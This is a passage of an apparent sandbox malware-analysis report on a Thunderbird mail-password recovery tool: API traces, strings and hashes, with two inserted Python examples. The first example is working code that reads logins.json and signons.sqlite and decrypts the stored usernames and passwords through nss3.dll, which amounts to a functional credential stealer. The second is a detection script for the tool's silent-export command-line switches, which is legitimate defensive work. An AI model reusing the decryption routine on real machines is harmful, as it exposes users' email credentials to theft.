                  • memset.MSVCRT ref: 0040E2AB
                  • memset.MSVCRT ref: 0040E2C9
                  • memset.MSVCRT ref: 0040E2E2
                  • GetCurrentProcess.KERNEL32 ref: 0040E2EA
                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040E30F
                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040E345
                  • memset.MSVCRT ref: 0040E39C
                  • GetCurrentProcessId.KERNEL32 ref: 0040E3AA
                  • memcpy.MSVCRT ref: 0040E3D9
                  • strcpy.MSVCRT(?,00000000), ref: 0040E3FB
                  • sprintf.MSVCRT ref: 0040E466
                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040E47F
                  • GetDlgItem.USER32(?,000003EA), ref: 0040E489
                  • SetFocus.USER32(00000000), ref: 0040E490
                  Strings
                  • {Unknown}, xrefs: 0040E259
                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040E460
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                  • API String ID: 138940113-3474136107
                  • Opcode ID: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
                  • Instruction ID: c9ff55592ed190661b3986ab950919d3506bad0d2814ede43270e5be3f0f5ae2
                  • Opcode Fuzzy Hash: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
                  • Instruction Fuzzy Hash: 4571D672404244BFD721DF61DC45EDB7FEDEB48344F00883EF648921A1DA399A65CBAA
                  APIs
                  • memset.MSVCRT ref: 0040E56D
                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                  • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                  • memset.MSVCRT ref: 0040E5C0
                  • strlen.MSVCRT ref: 0040E5CA
                  • strlen.MSVCRT ref: 0040E5D8
                  • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                  • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                  • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                  • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                  • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                  • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                  • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                  • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E6A2
                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                  • API String ID: 1296682400-4029219660
                  • Opcode ID: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
                  • Instruction ID: ea12e4d39b815288b34f85ef975f35705c11e21fdcabb8b0f4231a79c1823d94
                  • Opcode Fuzzy Hash: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
                  • Instruction Fuzzy Hash: 7E4197B1940318AACB20DF75CC49FC6BBE8AF64704F154C6BE185A2180E7B9A6D4CF58
                  APIs
                  • memset.MSVCRT ref: 0040FACA
                  • memset.MSVCRT ref: 0040FAE2
                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                  • memset.MSVCRT ref: 0040FB1A
                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040F299
                  • _mbsnbicmp.MSVCRT ref: 0040FB48
                  • memset.MSVCRT ref: 0040FB67
                  • memset.MSVCRT ref: 0040FB7F
                  • _snprintf.MSVCRT ref: 0040FB9C
                  • _mbsrchr.MSVCRT ref: 0040FBC6
                  • _mbsicmp.MSVCRT ref: 0040FBFA
                  • strcpy.MSVCRT(?,?,?), ref: 0040FC13
                  • strcpy.MSVCRT(?,?,?,?,?), ref: 0040FC26
                  • RegCloseKey.ADVAPI32(0040FD0A), ref: 0040FC51
                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC5F
                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040FC71
                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC9E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                  • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                  • API String ID: 3269028891-3267283505
                  • Opcode ID: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
                  • Instruction ID: 1ceab4daf47746688ac62aede77486c23684b0aa94ce4f67dad83c1e3abd437f
                  • Opcode Fuzzy Hash: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
                  • Instruction Fuzzy Hash: 3851C67194515DBEDB31E7A18D42EDB7BACAF14304F0004FAB684F2141EA789FC98B69
                  APIs
                  • memset.MSVCRT ref: 0040F7B8
                  • memset.MSVCRT ref: 0040F7CC
                  • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F7F9
                  • sprintf.MSVCRT ref: 0040F814
                  • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F821
                  • sprintf.MSVCRT ref: 0040F84B
                  • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F858
                  • strcat.MSVCRT(?,00414E74,?,?,?,?,?), ref: 0040F866
                  • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F878
                  • strcat.MSVCRT(?,004097A4,?,?,?,?,?), ref: 0040F883
                  • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F895
                  • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F8A7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcat$memsetsprintf$strcpy
                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                  • API String ID: 1662040868-1996832678
                  • Opcode ID: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
                  • Instruction ID: 1d89f71d6803e1250473f580c1fd87552222ed23aec69fbe6c7d3cec9cc88889
                  • Opcode Fuzzy Hash: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
                  • Instruction Fuzzy Hash: C731E673905714AEC720AA659D42DCBB76CAF14324F1082BFF214A2182D7BC9AD4CA9D
                  APIs
                  • memset.MSVCRT ref: 0040B056
                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040B067
                  • strrchr.MSVCRT ref: 0040B076
                  • strcat.MSVCRT(00000000,.cfg), ref: 0040B090
                  • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040B0C4
                  • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040B0D5
                  • GetWindowPlacement.USER32(?,?), ref: 0040B16B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$\LA
                  • API String ID: 1301239246-3877392175
                  • Opcode ID: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                  • Instruction ID: 0af9f59d4ba14ec1661be341c61033e05a04fd550f4be300a3a65ce9efdf479e
                  • Opcode Fuzzy Hash: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                  • Instruction Fuzzy Hash: F2414A72940118AFCB21DB54CC88FDABBBCAB58700F0441E6F509E7191DB749BC8CBA8
                  APIs
                  • memset.MSVCRT ref: 00409615
                  • memset.MSVCRT ref: 00409638
                  • memset.MSVCRT ref: 0040964E
                  • memset.MSVCRT ref: 0040965E
                  • sprintf.MSVCRT ref: 00409692
                  • strcpy.MSVCRT(00000000, nowrap), ref: 004096D9
                  • sprintf.MSVCRT ref: 00409760
                  • strcat.MSVCRT(?,&nbsp;), ref: 0040978F
                    • Part of subcall function 0040F6E2: sprintf.MSVCRT ref: 0040F701
                  • strcpy.MSVCRT(?,?), ref: 00409774
                  • sprintf.MSVCRT ref: 004097C3
                    • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                    • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,76F90A60,00000000,?,?,00409460,00000001,00413B1C,76F90A60), ref: 00405F21
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                  • API String ID: 2822972341-601624466
                  • Opcode ID: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
                  • Instruction ID: ad5d45e3310275bf8c81aed9ad428c342ee671dbf73ea1c77541a84cad310e98
                  • Opcode Fuzzy Hash: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
                  • Instruction Fuzzy Hash: AA615032900214AFDF18DF94CC85EDE7B79EF08314F1001AAFA05A71D2DB79AA95CB59
                  APIs
                    • Part of subcall function 00406C5E: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040D7DA,?,?,?,?), ref: 00406C77
                    • Part of subcall function 00406C5E: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00406CA3
                    • Part of subcall function 00404638: free.MSVCRT(00000000,0040BE16), ref: 0040463F
                    • Part of subcall function 00406209: strcpy.MSVCRT(?,?,0040D7FB,?,?,?,?,?), ref: 0040620E
                    • Part of subcall function 00406209: strrchr.MSVCRT ref: 00406216
                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C72C
                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C740
                    • Part of subcall function 0040C70B: memset.MSVCRT ref: 0040C754
                    • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C821
                    • Part of subcall function 0040C70B: memcpy.MSVCRT ref: 0040C881
                  • strlen.MSVCRT ref: 0040D81F
                  • strlen.MSVCRT ref: 0040D82D
                  • memset.MSVCRT ref: 0040D86E
                  • strlen.MSVCRT ref: 0040D87D
                  • strlen.MSVCRT ref: 0040D88B
                  • memset.MSVCRT ref: 0040D8CC
                  • strlen.MSVCRT ref: 0040D8DB
                  • strlen.MSVCRT ref: 0040D8E9
                  • _stricmp.MSVCRT(00000504,none,?,?,?,?,?,?), ref: 0040D997
                  • strcpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040D9B2
                    • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                    • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: strlen$memset$strcpy$memcpy$CloseFileHandleSize_stricmpfreestrcatstrrchr
                  • String ID: logins.json$none$signons.sqlite$signons.txt
                  • API String ID: 1405107918-3138536805
                  • Opcode ID: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                  • Instruction ID: d07004e2ff50c5cd41ef2cdd6425adcf976a56e41a8fa9a3887142b7f0986be6
                  • Opcode Fuzzy Hash: dc38bddda9e42b5c5320f9286ff75ddff83acf33bc21f5fa31688107119b79d7
                  • Instruction Fuzzy Hash: B051E3B2904145AED714EBE0CC85BDAB7ACAF41305F10057BE159E21C2EB78AAD98B5C
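                   Added example (not code from the sample, from NirSoft or from Joe Sandbox): the three function summaries above, the moz_logins query at 0040D4B5 with its mailbox://, imap:// and smtp:// prefixes, the nss3.dll export chain at 0040E65A..0040E6A2, and the logins.json / signons.sqlite / signons.txt file set, describe one workflow: locate a Thunderbird profile's credential store, key each stored login by scheme://host so it can be matched to an account server, and hand the base64 blobs to NSS for decryption. The Python below reconstructs that workflow so the pieces can be read together. Assumptions not on the page: the mailbox:// prefix is the one Thunderbird uses for POP3 servers; the profile uses key4.db (hence the "sql:" prefix to NSS_Init); all function and variable names are mine; the demo profile is constructed and its blob fields are placeholders rather than real PK11SDR output. The NSS part only runs where nss3.dll and its dependencies load; everywhere else it returns an empty list and the parsing and matching still work.

```python
import base64
import ctypes
import json
import os
import sqlite3
import tempfile
from collections import namedtuple

# Query shown verbatim in the report (xref 0040D4B5); it targets signons.sqlite.
MOZ_LOGINS_QUERY = ("SELECT id, hostname, httpRealm, formSubmitURL, usernameField, "
                    "passwordField, encryptedUsername, encryptedPassword FROM moz_logins")
# Prefixes the sample builds with sprintf (mailbox://%s, imap://%s, smtp://%s);
# that Thunderbird keys POP3 logins as mailbox:// is assumed here.
SCHEME_FOR_SERVER_TYPE = {"pop3": "mailbox", "imap": "imap", "smtp": "smtp"}
StoredLogin = namedtuple("StoredLogin", "hostname enc_user enc_pass")  # hostname like "imap://host"; enc_* base64 PK11SDR blobs

def read_logins_json(path):
    with open(path, encoding="utf-8") as fh:
        doc = json.load(fh)
    return [StoredLogin(e["hostname"], e["encryptedUsername"], e["encryptedPassword"])
            for e in doc.get("logins", [])]

def read_signons_sqlite(path):
    con = sqlite3.connect(path)
    try:
        rows = con.execute(MOZ_LOGINS_QUERY).fetchall()
    finally:
        con.close()
    return [StoredLogin(r[1], r[6], r[7]) for r in rows]   # indexes follow the SELECT

def load_profile_logins(profile_dir):
    # Newest store first; the legacy signons.txt from the string table is not handled.
    for name, reader in (("logins.json", read_logins_json), ("signons.sqlite", read_signons_sqlite)):
        path = os.path.join(profile_dir, name)
        if os.path.isfile(path):
            return reader(path)
    return []

def match_logins(logins, server_type, hostname):
    # Case-insensitive, like the _stricmp calls at 0040D6F0..0040D73B.
    key = f"{SCHEME_FOR_SERVER_TYPE[server_type]}://{hostname}".lower()
    return [l for l in logins if l.hostname.lower() == key]

class SECItem(ctypes.Structure):   # NSS SECItem: type, data pointer, length
    _fields_ = [("type", ctypes.c_uint), ("data", ctypes.c_void_p), ("len", ctypes.c_uint)]

def _sdr_decrypt(nss, b64):
    raw = base64.b64decode(b64)
    buf = ctypes.create_string_buffer(raw, len(raw))          # stays alive for the call
    inp, res = SECItem(0, ctypes.cast(buf, ctypes.c_void_p), len(raw)), SECItem(0, None, 0)
    if nss.PK11SDR_Decrypt(ctypes.byref(inp), ctypes.byref(res), None) != 0:
        return None
    return ctypes.string_at(res.data, res.len).decode("utf-8", "replace")   # result buffer not freed (one-shot)

def nss_decrypt(nss3_path, profile_dir, logins, master_password=b""):
    """Replays the seven exports resolved at 0040E65A..0040E6A2; works only where
    nss3.dll and its dependencies load (Windows + Thunderbird), else returns []."""
    try:
        if hasattr(os, "add_dll_directory"):   # same purpose as the sample's SetCurrentDirectoryA
            os.add_dll_directory(os.path.dirname(os.path.abspath(nss3_path)))
        nss = ctypes.CDLL(nss3_path)
    except OSError:
        return []
    nss.NSS_Init.argtypes = [ctypes.c_char_p]
    nss.PK11_GetInternalKeySlot.restype = ctypes.c_void_p
    nss.PK11_CheckUserPassword.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
    nss.PK11_Authenticate.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_void_p]
    nss.PK11SDR_Decrypt.argtypes = [ctypes.POINTER(SECItem), ctypes.POINTER(SECItem), ctypes.c_void_p]
    nss.PK11_FreeSlot.argtypes = [ctypes.c_void_p]
    if nss.NSS_Init(f"sql:{profile_dir}".encode()) != 0:   # "sql:" selects key4.db (assumed layout)
        return []
    slot, out = nss.PK11_GetInternalKeySlot(), []
    try:
        if nss.PK11_CheckUserPassword(slot, master_password) == 0 and nss.PK11_Authenticate(slot, 1, None) == 0:
            out = [(l.hostname, _sdr_decrypt(nss, l.enc_user), _sdr_decrypt(nss, l.enc_pass)) for l in logins]
    finally:
        nss.PK11_FreeSlot(slot)
        nss.NSS_Shutdown()
    return out

def demo():
    """Constructed profile, not real data: one logins.json entry and one
    signons.sqlite row (blob fields are placeholders, not real SDR output)."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "logins.json"), "w", encoding="utf-8") as fh:
        json.dump({"logins": [{"hostname": "imap://mail.example.test",
                               "encryptedUsername": "dXNlcg==", "encryptedPassword": "cGFzcw=="}]}, fh)
    db = os.path.join(d, "signons.sqlite")
    con = sqlite3.connect(db)
    con.execute("CREATE TABLE moz_logins (id INTEGER, hostname TEXT, httpRealm TEXT, formSubmitURL TEXT, "
                "usernameField TEXT, passwordField TEXT, encryptedUsername TEXT, encryptedPassword TEXT)")
    con.execute("INSERT INTO moz_logins VALUES (1,'smtp://MAIL.example.test',NULL,NULL,'','','dXNlcg==','cGFzcw==')")
    con.commit()
    con.close()
    from_json, from_db = load_profile_logins(d), read_signons_sqlite(db)
    return {"json_logins": len(from_json),
            "imap_hosts": [l.hostname for l in match_logins(from_json, "imap", "Mail.Example.Test")],
            "smtp_from_db": [l.hostname for l in match_logins(from_db, "smtp", "mail.example.test")],
            "decrypted": nss_decrypt(os.path.join(d, "nss3.dll"), d, from_json)}
```

                   The point for a defender is that nothing in this chain needs elevated rights or an exploit: the blobs are readable by the profile's owner and nss3.dll decrypts them with the key that ships in the same profile, so the only thing standing between a process running as the user and the plaintext is a Thunderbird master password (PK11_CheckUserPassword is where it is checked). Reading logins.json or signons.sqlite from a process that is not thunderbird.exe, and a non-Mozilla process loading nss3.dll from the Thunderbird install directory, are therefore the observable behaviours worth alerting on.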
                  APIs
                  • _stricmp.MSVCRT(/shtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA27
                  • _stricmp.MSVCRT(/sverhtml,0041344F,0040BB20,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BA3C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: _stricmp
                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                  • API String ID: 2884411883-1959339147
                  • Opcode ID: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
                  • Instruction ID: 9cc75f2135a457fb5b155108ec4f1482e5c4f70433a9f240ecae405c43e57cbb
                  • Opcode Fuzzy Hash: b70f27fc5aecc47ba7919a44c3d765b9763ae409b21ddab941f54064ab36d7b0
                  • Instruction Fuzzy Hash: 0401DE7238A31128F934A1A63E17BD30A44CBE1B7AF30465BF555E41C1EF9D949094AC
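                   Added example (not the sample's code and not from Joe Sandbox): the _stricmp calls above compare the command line against /scomma, /shtml, /skeepass, /stab, /stabular, /sverhtml and /sxml, the switches that make the tool dump every recovered credential to a file without showing a window. That is the form in which this kind of password viewer is dropped by other malware, so the switch list is a usable process-creation detection on its own. The Python below runs that check over constructed process-creation events (image path plus command line, as Sysmon event 1 or Security event 4688 would record them) and scores each hit. Assumptions: the switch set is exactly the seven strings on this page; mailpv.exe as the tool's usual file name, the severity weights and the event field names are mine; the events are made up for the example.

```python
import re

# Export switches present in the sample's string table (0040BA27 / 0040BA3C and
# the String ID list above): with one of them the tool writes its results to a
# file and shows no window.
SILENT_EXPORT_SWITCHES = ("/scomma", "/shtml", "/skeepass", "/stab", "/stabular", "/sverhtml", "/sxml")

# Longest alternatives first so /stabular is not matched as /stab + "ular"; the
# switch must be a whole token, and the output path (quoted or bare) is optional
# so a truncated log line still produces a hit.
_SWITCH_RE = re.compile(
    r'(?<!\S)(' + "|".join(re.escape(s) for s in sorted(SILENT_EXPORT_SWITCHES, key=len, reverse=True))
    + r')(?!\S)(?:\s+("[^"]*"|\S+))?', re.IGNORECASE)

def find_silent_export(cmdline):
    """Return (switch, output_path) when the command line uses a silent-export
    switch, else None."""
    m = _SWITCH_RE.search(cmdline)
    if not m:
        return None
    return m.group(1).lower(), (m.group(2) or "").strip('"')

def score(finding, image):
    """Heuristic severity: the switch alone is suspicious; a renamed binary and
    an output path on a share or in a Temp directory each raise it by one."""
    switch, out = finding
    s = 1
    if not image.lower().endswith("mailpv.exe"):   # the tool's usual file name, assumed
        s += 1
    if out.startswith("\\\\") or "\\temp\\" in out.lower():
        s += 1
    return s

def scan(events):
    """events: iterable of dicts with "Image" and "CommandLine" keys."""
    hits = []
    for ev in events:
        f = find_silent_export(ev["CommandLine"])
        if f:
            hits.append({"image": ev["Image"], "switch": f[0], "output": f[1],
                         "score": score(f, ev["Image"])})
    return hits

# Constructed process-creation events (not taken from the sandbox run above).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\AppData\Local\Temp\svchost32.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Temp\svchost32.exe" /scomma C:\Users\alice\AppData\Local\Temp\mp.txt'},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"cmd.exe /c dir /s C:\Users"},
    {"Image": r"C:\Tools\mailpv.exe", "CommandLine": r'mailpv.exe /sverhtml "\\fileserver\share\mail.html"'},
    {"Image": r"C:\Tools\mailpv.exe", "CommandLine": r"mailpv.exe /stabular"},
    {"Image": r"C:\Program Files\Tool\tool.exe", "CommandLine": r"tool.exe --stab=1"},
]
```

                   Two caveats for use in a real rule set. The same switch family is shared by the whole NirSoft tool line, so this matches their other viewers too, which is normally what you want; and NirSoft tools also accept /stext, which the function summary on this page does not show, so a production rule should add it. Treat a hit with a renamed image or an output path on a network share as the high-severity case: a legitimate administrator recovering their own passwords rarely needs either.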
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                   • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: sprintf$memset$strcpy
                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                  • API String ID: 898937289-3842416460
                  • Opcode ID: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
                  • Instruction ID: e1dfaf3f0aab17dcf8878a0a22dd94d4c671af1ddc0a59b8f6102d88430d0a7a
                  • Opcode Fuzzy Hash: 545e006f70f27d5e232efb2f2e670bdaa3235a9e542d9c48a27740188541449b
                  • Instruction Fuzzy Hash: F94133B2C4111D6EDB21DA54CD41FEB776CEF54348F0401BBB618E2142E2789F988F69
                  APIs
